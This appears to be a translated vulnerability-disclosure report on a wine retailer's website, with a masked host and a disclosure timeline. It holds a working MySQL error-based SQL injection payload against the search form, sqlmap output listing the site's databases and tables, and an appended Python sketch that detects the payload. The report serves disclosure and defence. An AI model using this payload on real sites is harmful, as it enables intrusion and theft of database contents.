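2015-12-29: Details reported to the vendor; awaiting vendor handling
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and experts in related fields
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
夏朵 was founded in December 1999 and is now 14.5 years old. "夏朵" is a name that sounds very feminine and very French, and rightly so: it is a direct transliteration of the French word "Chateaux" (wine château). It was originally formed by three senior saleswomen who loved wine culture; today most of the employees are shareholders, and the sales staff are all women, each with more than 15 years of experience in the wine trade. We are known for selling French classified-growth wines, and we are proud to say that 夏朵 holds a very important place in the top-end wine market, thanks to our professional team and the customers who support us.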
Site:
http://**.**.**.**/
The search function is vulnerable to POST-based SQL injection. Captured request:
POST /search.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/search.php
Cookie: PHPSESSID=c73a78dc58fd5819b08078c04d627c9d
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

keyword=1&Searchtype=1&button=%E9%80%81%E5%87%BA
Data:
Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: keyword=1' AND (SELECT 7441 FROM(SELECT COUNT(*),CONCAT(0x3a7272633a,(SELECT (CASE WHEN (7441=7441) THEN 1 ELSE 0 END)),0x3a7471643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NarQ'='NarQ&Searchtype=1&button=??
---
[11:48:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[11:48:37] [INFO] fetching current user
[11:48:38] [INFO] retrieved: xuaetahc_web@localhost
current user: 'xuaetahc_web@localhost'

available databases [2]:
[*] information_schema
[*] xuaetahc_webdb

Database: xuaetahc_webdb
[14 tables]
+---------------------------------------+
| pro_brand |
| pro_cate |
| pro_formula |
| pro_level |
| pro_nation |
| pro_product |
| pro_region |
| pro_type |
| pro_v2p |
| pro_vendor |
| tbadmin |
| tbconposter |
| tbcontype |
| tbdealers |
+---------------------------------------+

Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_TEMPORARY_TABLES |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_RESPONSE_TIME |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TEMPORARY_TABLES |
| THREAD_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
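
A detection-side sketch for the finding above, added here as an example and not part of the original report: it URL-decodes form bodies posted to the search endpoint and flags any field that carries two or more structural markers of the error-based payload quoted in the sqlmap output. The marker names, the threshold and the apostrophe sample are assumptions made for illustration; this complements, and does not replace, parameterizing the query behind search.php.

```python
import re
from urllib.parse import parse_qs, urlencode

# Structural markers of the MySQL error-based payload quoted in the report.
# Names are illustrative; all patterns are matched after URL decoding.
MARKERS = {
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "quote_break": re.compile(r"'\s*(and|or)\b", re.I),
}
THRESHOLD = 2  # assumption: a lone marker (an apostrophe in a wine name) is too noisy


def score_body(body):
    """Return {field: [marker names]} for form fields that look injected."""
    hits = {}
    fields = parse_qs(body, keep_blank_values=True, errors="replace")
    for name, values in fields.items():
        found = [m for m, rx in MARKERS.items() if any(rx.search(v) for v in values)]
        if len(found) >= THRESHOLD:
            hits[name] = found
    return hits


# BENIGN is the captured body from the report; APOSTROPHE is a constructed
# legitimate search; INJECTED re-encodes the payload quoted in the report.
BENIGN = "keyword=1&Searchtype=1&button=%E9%80%81%E5%87%BA"
APOSTROPHE = urlencode({"keyword": "L'Or de Jean Martell", "Searchtype": "1"})
PAYLOAD = (
    "1' AND (SELECT 7441 FROM(SELECT COUNT(*),CONCAT(0x3a7272633a,"
    "(SELECT (CASE WHEN (7441=7441) THEN 1 ELSE 0 END)),0x3a7471643a,"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
    "AND 'NarQ'='NarQ"
)
INJECTED = urlencode({"keyword": PAYLOAD, "Searchtype": "1"})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("apostrophe", APOSTROPHE),
                        ("injected", INJECTED)):
        print(label, score_body(body) or "clean")
```
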
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-12-31 02:02
Thank you for the report.
None yet